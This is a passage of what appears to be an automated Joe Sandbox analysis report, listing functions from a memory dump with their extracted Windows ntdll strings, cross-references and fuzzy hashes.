Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 7cbe1a1da318244bce33da0c59c8c7183c517f80e804b387048e68f117351823
Instruction ID: 9cf0a63e1207588f704aebafb40c6f15bb49353e628f57bd73cca629637ef7ae
Opcode Fuzzy Hash: 7cbe1a1da318244bce33da0c59c8c7183c517f80e804b387048e68f117351823
Instruction Fuzzy Hash: CB8189B1A41358AFDB20CF99CC41BAEBBB9EB48B10F684159F506B7240D375AD41CF60

Function 016629F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 016A2506
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 016A2409
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016A25EB
RtlpResolveAssemblyStorageMapEntry, xrefs: 016A261F
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016A24C0
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 016A2412
@, xrefs: 016A259B
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 016A2602
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 016A2498
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 016A2624
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016A22E4

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 4bc8f7a4a91d92cff85bdbc3239d085a052194b25e9c9cffd1f1e15ff299a18e
Instruction ID: 3ec5a52d8ba8d3cd9d2bd3f1bc5fab449d2142f29724f62e3992406b8a0c6485
Opcode Fuzzy Hash: 4bc8f7a4a91d92cff85bdbc3239d085a052194b25e9c9cffd1f1e15ff299a18e
Instruction Fuzzy Hash: A8028FB1D402299FDB61DB54CC90BDAB7B8AF54304F4041EEEA09A7241EB30AE85CF59

Function 016D8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 016D8BD0
services.exe, xrefs: 016D8B96
svchost.exe, xrefs: 016D8B68
runtimebroker.exe, xrefs: 016D8B73
heapType, xrefs: 016D8BCB
DefaultBrowser_NOPUBLISHERID, xrefs: 016D8D00
SegmentHeap, xrefs: 016D8BE9
lsass.exe, xrefs: 016D8BA1
csrss.exe, xrefs: 016D8B80
smss.exe, xrefs: 016D8B8B

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: a903a4066bd420fac3d388646bfda89039e1657f4e0515be560fa5281d277c4d
Instruction ID: dab8a732e7fc90b43b1e82c5c701a1903d326d0fb8fbbd3cb5c7809ab0670399
Opcode Fuzzy Hash: a903a4066bd420fac3d388646bfda89039e1657f4e0515be560fa5281d277c4d
Instruction Fuzzy Hash: 5551B171A043419BD32ADF188C48BABBBECFF94650F14492DF999C3281E770E605C7A2

Function 0164AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

DLL search path passed in externally: %ws, xrefs: 016980A6
minkernel\ntdll\ldrapi.c, xrefs: 01698086, 016983BC
minkernel\ntdll\ldrutil.c, xrefs: 016980B7
DLL name: %wZ, xrefs: 01698075
Status: 0x%08lx, xrefs: 016982D0, 016983AB
LdrpInitializeDllPath, xrefs: 016980AD
LdrpFindLoadedDllInternal, xrefs: 016982D7
LdrGetDllHandleEx, xrefs: 0169807C, 016983B2
minkernel\ntdll\ldrfind.c, xrefs: 016982E1

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: 48202846a7e23605b0bdc494e2e3f31a71d8acc7509f8ab87b844c9489d9a6ca
Instruction ID: 8d0383adc391227f856b3a5ba254f7496aacfb05eccc19e1365bdfbfa30f5d3c
Opcode Fuzzy Hash: 48202846a7e23605b0bdc494e2e3f31a71d8acc7509f8ab87b844c9489d9a6ca
Instruction Fuzzy Hash: 141210716083429BD734DF68CC40BAAB7E9BF95B14F04491EF9868B391E730D905CB92

Function 016E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

Invalid allocation size - %Ix (exceeded %Ix), xrefs: 016E06EA
HEAP: , xrefs: 016E03A6, 016E04B5, 016E05DD, 016E0682, 016E06D9
HEAP[%wZ]: , xrefs: 016E0399, 016E04A8, 016E05D0, 016E0675, 016E06CC
RtlReAllocateHeap, xrefs: 016E02BF, 016E0362
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 016E069F
About to reallocate block at %p to %Ix bytes, xrefs: 016E03BA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 016E04D3
Just reallocated block at %p to %Ix bytes, xrefs: 016E05F1

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 9a26340fdc46381f315216cd0675db48f5d6a1259e56fc36be06533219375cab
Instruction ID: eaaac44ac4b1b00a7941b8965459f9e9f1ad75f3a52f7a8b98f7b2904ab84643
Opcode Fuzzy Hash: 9a26340fdc46381f315216cd0675db48f5d6a1259e56fc36be06533219375cab
Instruction Fuzzy Hash: 9DD1CF31602696DFDB22DF68C848AAABBF2FF5A710F188149F4469B351C7B49942CF14

Function 016B89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierFlags, xrefs: 016B8C50
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 016B8A67
VerifierDlls, xrefs: 016B8CBD
VerifierDebug, xrefs: 016B8CA5
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 016B8A3D
AVRF: -*- final list of providers -*- , xrefs: 016B8B8F
HandleTraces, xrefs: 016B8C8F

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 0e2c69d13752194f3e940fc560b589f692e72acc4ac0acc7ea17a54f5b20c9ae
Instruction ID: c3c52c3dc3006e6160760a1cb399635ddb7f4f9139feb34246b6ccd3b205f6ef
Opcode Fuzzy Hash: 0e2c69d13752194f3e940fc560b589f692e72acc4ac0acc7ea17a54f5b20c9ae
Instruction Fuzzy Hash: 829123B2645722AFD331DF288CD0BEA7BEDAB55724F44445DFA416B281C7309C82CB99

Function 0163EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

, xrefs: 0163F299
R, xrefs: 0163EB62
LdrpResSearchResourceInsideDirectory Enter, xrefs: 0163EB58
T, xrefs: 0163EB4E
{, xrefs: 01694643
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0163EB6C

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: b59d3a5d31398b5c3020afeac8632df32d64f1443d4039f52455e30eaf2a3e6e
Instruction ID: 3cb2e05a3f917d570d227c1df9af7d60757804af75375537179a4e81489a6727
Opcode Fuzzy Hash: b59d3a5d31398b5c3020afeac8632df32d64f1443d4039f52455e30eaf2a3e6e
Instruction Fuzzy Hash: E0A23774E0562A8BDF64CF29CD887A9BBB5AF85304F1442E9D90DA7350DB319E82CF50

Function 016663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 016A413A
Delaying execution failed with status 0x%08lx, xrefs: 016A4258
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 016A41FE
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 016A40D8
minkernel\ntdll\ldrinit.c, xrefs: 016A40E9, 016A414B, 016A420F, 016A4269
_LdrpInitialize, xrefs: 016A40DF, 016A4141, 016A4205, 016A425F

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: a1b0746c4d8ce3c70bf23d701edc7b1093a5534861527e2f3710b2aa0d05ce05
Instruction ID: 141160f429d952b2eec565bdbb76dd1dacfe6da3fba392c35fcb4d3b47b451db
Opcode Fuzzy Hash: a1b0746c4d8ce3c70bf23d701edc7b1093a5534861527e2f3710b2aa0d05ce05
Instruction Fuzzy Hash: 0E917A70B013159BEB35DF18EC94BAA7BA6FF50B24F58812DE90167381DBB49C42CB94

Function 0162645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

LdrpInitShimEngine, xrefs: 016899F4, 01689A07, 01689A30
Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 016899ED
minkernel\ntdll\ldrinit.c, xrefs: 01689A11, 01689A3A
Getting the shim user exports failed with status 0x%08lx, xrefs: 01689A01
Loading the shim user DLL failed with status 0x%08lx, xrefs: 01689A2A
apphelp.dll, xrefs: 01626496

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 71aefc4c8b3d7673c3601fb5187014d63af3b4beb3cccf95c3a0882cc055af27
Instruction ID: c16092bb19f968a913e3c8ddcd78768e1d057b71cee2b226b65f7e009a0ea02f
Opcode Fuzzy Hash: 71aefc4c8b3d7673c3601fb5187014d63af3b4beb3cccf95c3a0882cc055af27
Instruction Fuzzy Hash: 7151DF712483059FE720EF24CC91BABB7E5FB84758F044A1DF98697254DB30E905CB96

Function 01662674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 016A2165
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016A21BF
RtlGetAssemblyStorageRoot, xrefs: 016A2160, 016A219A, 016A21BA
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 016A219F
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 016A2178
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 016A2180

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 47b2953cb1204e38cd254324d98e46b581eeb98ee4e738f1336a1ef0f06f00f4
Instruction ID: f742d4db103c3e98efe3009e8990b7fcc7388f96110da735c26decde7f87d9a8
Opcode Fuzzy Hash: 47b2953cb1204e38cd254324d98e46b581eeb98ee4e738f1336a1ef0f06f00f4
Instruction Fuzzy Hash: 55314B36F8021577E7218A998C91F6B7F7DDBA4A41F09406DFB0567245D770AE01CBE0

Function 0166C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 016A81E5
LdrpInitializeImportRedirection, xrefs: 016A8177, 016A81EB
minkernel\ntdll\ldrinit.c, xrefs: 0166C6C3
LdrpInitializeProcess, xrefs: 0166C6C4
minkernel\ntdll\ldrredirect.c, xrefs: 016A8181, 016A81F5
Loading import redirection DLL: '%wZ', xrefs: 016A8170

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: f4434d840c7757ab428556f10e3e2e3a5c745d2ce40dde8e071c837ab041d09f
Instruction ID: fc8f0fe6f3809db7fe7533e5a246776f2350cabf7d485628395d04b3a8e471aa
Opcode Fuzzy Hash: f4434d840c7757ab428556f10e3e2e3a5c745d2ce40dde8e071c837ab041d09f
Instruction Fuzzy Hash: F13104716447429BD224EF28DC45E2A77A9FF94B20F04055CFD85AB391E720EC05CBA6

Function 0167096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01672DF0: LdrInitializeThunk.NTDLL ref: 01672DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01670BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01670BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01670D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01670D74

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 47da76abc41be5ab037df691bf36d8aa76f094706d73c7b1dfb3c6ecb7cc8064
Instruction ID: cac059d1544e5996362dead2e0183b03d6c1e23271225ed025758cd42bcbe7cc
Opcode Fuzzy Hash: 47da76abc41be5ab037df691bf36d8aa76f094706d73c7b1dfb3c6ecb7cc8064
Instruction Fuzzy Hash: 27424971900715DFDB61CF28CC80BAAB7F5FF45314F1485AAE989AB241E770AA85CF60

Function 0163A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 0163A3F7
LdrResFallbackLangList Enter, xrefs: 0163A3EF
8, xrefs: 0163A3E7
LdrResFallbackLangList Exit, xrefs: 0163A3FF

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 0bd0977bfbc89a516d3ef7d7c3b47aee9d46e74825cb18af96d214319f3af830
Instruction ID: 2639f170fb5fd719aa215ae6d13ecdb979c491122e94bd23b8244d3ddc9dbc1f
Opcode Fuzzy Hash: 0bd0977bfbc89a516d3ef7d7c3b47aee9d46e74825cb18af96d214319f3af830
Instruction Fuzzy Hash: 53C16675108382DBDB11CF98C844B6AB7E4AF84704F04896EF9D6CB391E734C94ADB56

Function 01668402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 01668591
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0166855E
minkernel\ntdll\ldrinit.c, xrefs: 01668421
LdrpInitializeProcess, xrefs: 01668422

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 5a94b7345f303f942d0503b48b8cd3c75fcbabe74936a378d6d99d63c2d1868d
Instruction ID: 034e3e22dafe4dd8df2a18b862e24a794c91e2bf357194616241309b9c7638d5
Opcode Fuzzy Hash: 5a94b7345f303f942d0503b48b8cd3c75fcbabe74936a378d6d99d63c2d1868d
Instruction Fuzzy Hash: 70919871508345AFD722EE25CC90FABBBEDEB84744F80092EFA8593251E730D9048B66

Function 0166273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 016A21DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016A21D9, 016A22B1
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016A22B6
.Local, xrefs: 016628D8

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 0ad6c3f77f868d809283b81c6809810301018dc0d6407e507ca4ea732cf541e4
Instruction ID: aa8c8df2cbfc49f90b58a7668c156cb5a9be3ddd2601a0091a6d5e23b61110f7
Opcode Fuzzy Hash: 0ad6c3f77f868d809283b81c6809810301018dc0d6407e507ca4ea732cf541e4
Instruction Fuzzy Hash: FFA1C03194022ADBDB24CF69CC94BA9B7B9BF98314F1542EDD908A7351D7309E81CF94

Function 01664AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

RtlDeactivateActivationContext, xrefs: 016A3425, 016A3432, 016A3451
SXS: %s() called with invalid flags 0x%08lx, xrefs: 016A342A
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 016A3437
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 016A3456

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 01d2b303a1a0176346bd58ffee2a078bf11382f25f40d16d43fd32564f986b4f
Instruction ID: b6089991a24e6473212aa42edbfc636ef8dbec207093a63e64b376b38accebcf
Opcode Fuzzy Hash: 01d2b303a1a0176346bd58ffee2a078bf11382f25f40d16d43fd32564f986b4f
Instruction Fuzzy Hash: 1261FE366017129BD7228F1DCC81B2AB7E9FF80A50F58852DE9569B345CB30EC01CB95

Function 016364AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01691028
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0169106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01690FE5
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016910AE

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 12eeaba6f1af4b72c9e2da77336c1955ab52c9b181f381bb9d1f41117a0a0919
Instruction ID: 9da24680ef55ab4f117a24e2a1a905d8af36b410c9b18ef0167eab36ed91dc7d
Opcode Fuzzy Hash: 12eeaba6f1af4b72c9e2da77336c1955ab52c9b181f381bb9d1f41117a0a0919
Instruction Fuzzy Hash: BD71CCB1904305AFCB21EF18CC84B9B7BA9EF94764F40446CF9498B286D734D689CBD6

Function 0165245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0169A992
LdrpDynamicShimModule, xrefs: 0169A998
minkernel\ntdll\ldrinit.c, xrefs: 0169A9A2
apphelp.dll, xrefs: 01652462

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: dc6498c9903d4ec21eab57820fc2f1fa9f7380471ed39ae612404877fd9a74ff
Instruction ID: 2ad70fdfd9d97c4ae6316be7edb5fb834a3be807c261a6ac4df356eb7812fd25
Opcode Fuzzy Hash: dc6498c9903d4ec21eab57820fc2f1fa9f7380471ed39ae612404877fd9a74ff
Instruction Fuzzy Hash: D531F371A40201EBDB319F9DDC91A6ABBF9FB84724F25405DFD01A7345C7B45982CB90

Function 016429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01643264
HEAP[%wZ]: , xrefs: 01643255
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0164327D

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: f1ef7b85c365377b37605d77a037341ef24ece4c4aaddf71a2f90990b071d337
Instruction ID: bc8d6cad3b6349b15c91bde117fa05b36b0230c6e7a266d5f9b967fae5def309
Opcode Fuzzy Hash: f1ef7b85c365377b37605d77a037341ef24ece4c4aaddf71a2f90990b071d337
Instruction Fuzzy Hash: 3392CC71A042599FDB25CF68D8547AEBBF1FF48304F28809DE899AB391D734A942CF50

Function 01640770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 016950CA
HEAP: , xrefs: 016950BD
HEAP[%wZ]: , xrefs: 016950AE

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 71711f20b11251701f7cdc5df1350438474c15501727f32c664751c4f922e52a
Instruction ID: d6b6a0e1b8e32fe976f1f2c4ae50a55a06479830518b46043b450857e30ab85b
Opcode Fuzzy Hash: 71711f20b11251701f7cdc5df1350438474c15501727f32c664751c4f922e52a
Instruction Fuzzy Hash: ECF1BF74700616DFEB16CF68CC94BAAB7B5FF45304F1481A9E6069B381D734E982CB90

Function 01656962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 0169CA51
@, xrefs: 01656C24

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 974c339399dc2f5e59bca3ad087799883004f48c1214db7568ebb8d957aba868
Instruction ID: 456230dca04a09636e69d997e0c64752c6b369bc94118809bf403d1805aa0f20
Opcode Fuzzy Hash: 974c339399dc2f5e59bca3ad087799883004f48c1214db7568ebb8d957aba868
Instruction Fuzzy Hash: 41C27C71A083519FEB65CF28CC81BABBBE5AF88754F44892DE98987341D734D805CB92

Function 0162A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 0168C1E4
UseFilter, xrefs: 0162A1C1
FilterFullPath, xrefs: 0168C2E6

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

